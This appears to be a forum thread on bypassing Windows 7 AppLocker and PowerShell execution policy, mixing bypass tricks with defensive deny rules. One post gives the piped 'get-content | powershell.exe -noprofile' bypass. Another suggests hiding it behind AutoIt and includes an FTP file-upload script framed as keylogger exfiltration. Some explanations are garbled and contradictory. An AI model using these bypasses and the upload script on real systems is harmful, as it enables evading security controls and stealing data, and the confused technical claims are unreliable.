Can I bypass Windows 7 AppLocker?

[Charu Sharma]

we know that PowerShell scripts cannot be executed. Actually it has execution policies regarding PowerShell scripts. It should be enabled to Restricted it implies that there should not execution scripts taken place. In order to allow execution you should run PowerShell by having administrative privileges and simply modify execution policy to Unrestricted. You can bypass policies by using below mentioned example.

Code:

get-content .\dnscrypt-proxy.ps1 | powershell.exe –noprofile

you have to use cmdlet Get-Content so that would get all the content of script dnscrypt-proxy.ps1

after that you have to pipeline content and it should be pass to powershell.exe. powershell.exe should be running with parameters –noprofile and it implies that PowerShell profile should be executed.
In case AppLocker is not allowing execution of *.ps1 files. The script would run bypassing PowerShell execution policies and AppLocker.. it should bypass SRP.
One will be able to bypass PowerShell execution policies by using administrative privileges and after that powershell.exe should be read as well as execute script instructions one line after another. I don’t think so there is a security issue rather it’s an backdoor into PowerShell which allows us security measures which should be bypassed.

[jaykant]

Well we know that AppLocker allows you to mentioned application which can be or cannot be run on network. AppLocker’s management tools which are optimized creating allow list for application. If application is not mentioned into allowed list then it should be blocked by system. it seems to be quite difficult to create as well as maintain allow list.
If you wanted to block Powershell using Applocker then you should add following rules.

Executable rules

You should add below mentioned things into Exceptions tab of ‘Allow Everyone All files located in the Windows folder’ rule. It would be applicable if you are using default Windows auto-generated path rules as well as Deny for Everyone rule. Also it would work for you if you supposed to blocking the same as administrator of the system.

Code:

C:\Windows\System32\*powershell.exe
C:\Windows\System32\*powershell_ise.exe
C:\Windows\winsxs\*powershell.exe
C:\Windows\winsxs\*powershell_ise.exe

DLL rules

You should following code under of Exceptions tab of Allow Microsoft Windows DLLs rule. Rest of the things would be same as above.

Code:

C:\Windows\winsxs\*powershell_ise.resources.dll

I am hoping that it would be useful to get the requirement of yours.

[Agavoli]

If you are looking to allow PowerShell script which should be executed by creating hash rule in AppLocker. You will wonder that script should not be allowed for execution in case it has been modified and hash values does not seems to matching. AppLocker does not seems to working in case script is getting modified.

Well we are making use of default deny policy and outbound control in Firewall. Script should be interacting with Internet. If you have tried to execute the script by means of standard user rights there should be some tool coded into *.ps1 file of user profile folder. Simply hiding the script and making use of scripting language which allow you to do automate GUI input. Say AutoIt or AutoHotKey. It would hide everything from user of yours. it would launch powershell.exe and PowerShell window supposed to be hidden. It would trigger keyboard and simply write command get-content .\script_here.ps1 | powershell.exe -noprofile – and press enter key.

On the basis of actions one will be able to bypass firewall without having rule. If we consider a script which is interacting with internet. It would allow to make use of another component which would allow connection and it might be abused. Could be user managed to get script to upload files to ftp server or download.
Below mentioned script let you to upload file on ftp server.

Code:

$FileToUpload = "Path to\powershell.txt"
$ftp = "ftp://username:password@domain.com/pub/incoming/powershell.txt"
"ftp url: $ftp"
$WebClient = New-Object System.Net.WebClient
$URI = New-Object System.Uri($ftp)
$webclient.UploadFile($URI, $FileToUpload)

The above mentioned script should be use by powershell.exe. if it is allowed in firewall and keylogger should abuse PowerShell. So in this particular manner AppLocker as well as firewall.

[Iquau]

I used to do privilege isolation on the system of mine. I am having different standard user accounts which can be used to complete different tasks. I was not able to access web browser by using one of the account. In fact there was no profile into connection device for all the user account.
If I am working in one of user account and I have saved PowerShell script into user profile. This particular script should be having security stores and restricted standard user account. I using credentials of those accounts which should be used to initiate DNSCrypt for rest of the user accounts. By default AppLocker should block as there will not be any matching of hashes. But it would work because of backdoor in Powershell.

Code:

$username = ""
$password = ""
$credentials = New-Object System.Management.Automation.PSCredential -ArgumentList @($username,(ConvertTo-SecureString -String $password -AsPlainText -Force))
Start-Process DVDMaker -WorkingDirectory "C:\Program Files\DVD Maker" -Credential ($credentials)

Credentials should be stored in file and which should be created into another script. Now consider that credentials are secured.

You are using an user account which is not having an access to internet. However you will be able to point out the other user account by means of PowerShell. So possibly user will be able to make access to Internet and permissions to utilize web browser.

Code:

Start-Process browser -WorkingDirectory "C:\Program Files\browser folder" -Credential ($credentials)

Now you should save script and launch PowerShell and execute following.

Code:

get-content .\script.ps1 | powershell.exe -noprofile –

now you should open web browser by using credential of other users. This particular user account will be able to get an access on Internet as well as download. Since there will not be any desktop privilege isolation, if there is desktop isolation you have to schedule the task.

[Clarice]

By running Sandboxie you will be able to create dedicated sandbox to PowerShell. It would run both powershell.exe as well as PowerShell_ISE.exe to run in sandbox. After that execution should be allowed into sandbox.

Code:

powershell_blocked.exe and PowerShell_ISE_blocked.exe

the above mentioned thing would simply terminate powershell.exe and PowerShell_ISE.exe.
if you are looking to have PowerShell for local task then you should create a firewall rule which should prevent powershell.exe to connect outside until and unless it is needed. If you are looking to connect out then you have to restrict the same with specific domain names if firewall would let you to add domain as well as desired IP.